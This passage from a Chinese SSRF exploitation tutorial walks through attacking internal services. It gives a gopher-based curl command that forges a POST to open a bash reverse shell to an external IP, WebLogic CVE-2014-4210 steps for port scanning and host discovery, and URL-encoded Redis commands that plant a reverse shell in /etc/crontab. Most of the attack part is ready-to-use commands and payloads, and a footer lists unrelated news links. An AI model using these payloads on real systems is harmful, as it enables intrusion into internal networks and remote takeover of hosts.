CSDNSSRF 漏洞危害大,应避免被利用攻击内网应用!| 原力计划( 四 )
本文插图
本文插图
反弹成功
http://39.x.x.x:8000/ssrf.php是存在SSRF漏洞的Web服务
192.168.1.4是redis应用所在内网ip
121.36.67.230是公网服务器 , 接收反弹shell
(2)伪造post请求反弹shell
curl -v 'http://39.x.x.x:8000/ssrf.php?url=gopher://192.168.1.5:80/_POST%20/post.php%20HTTP/1.1%250d%250aHost:%2039.105.93.165%250d%250aUser-Agent:%20curl/7.58.0%250d%250aAccept:%20*/*%250d%250aContent-Type:%20application/x-www-form-urlencoded%250d%250a%250d%250acmd%3Dccccc%250d%250a%250d%250abash%20-i%20%3E%26%20%2fdev%2ftcp%2f121.36.67.230%2f4444%200%3E%261'
本文插图
本文插图
反弹成功
192.168.1.5是内网Web服务 , 有post.php
4 .利用http/s协议
探测内网主机存活
本文插图
说明内网ip为192.168.1.3的主机存活
本文插图
SSRF攻击应用实战
1、gopher攻击redis
参考远程利用 3.利用gopher协议
2、weblogic ssrf攻击redis
CVE-2014-4210
编译并启动环境
docker-compose builddocker-compose up -d SSRF漏洞存在于http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp
1.查看端口
访问
/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:80//测试http://127.0.0.1:7001:将80替换成7001
本文插图
not connect , 说明80端口未开放 。
本文插图
返回404 , 说明端口开放 。
2.探测内网主机存活
本文插图
说明内网ip为192.168.1.1的主机存活 。
3.注入HTTP头 , 利用Redis反弹shell
通过ssrf探测内网中的redis服务器 , 发现172.22.0.2:6379可以连通
和上边的远程利用几乎一样 。
将反弹shell脚本写入/etc/crontab定时任务
set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/121.36.67.230/4444 0>&1\n\n\n\n"config set dir /etc/config set dbfilename crontabsave 进行url编码
test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F121.36.67.230%2F4444%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa
推荐阅读
- 驱动中国腾讯内部人士爆料:与“老干妈”合作多个环节有漏洞 却无人察觉
- 黑爪影视|规则恐有漏洞,掉分就能进巅峰决赛?,云顶之弈公开赛开始报名
- FreeBufDEDECMS伪随机漏洞分析
- 八卦娱乐小星人|桃炎针对肖战计划失败,价值六位数报告漏洞百出,白涨二十万粉丝
- 央视新闻客户端|外来危害性物种福寿螺入侵洱海,大理“重金悬赏”采摘螺卵者
- Hysound|睡眠过多的危害
- 新华社|“惩治危害国家安全的犯罪分子将推动香港恢复安宁”——访香港特区政府首任律政司司长梁爱诗
- “惩治危害国家安全的犯罪分子将推动香港恢复安宁”——访香港特区政府首任律政司司长梁爱诗
- 腾讯内部人士爆料:与“老干妈”合作多个环节有漏洞 却无人察觉
- 闲人侃篮球|王建军谈两个失败原因:一个太吃亏,一个漏洞大,深圳惜败山东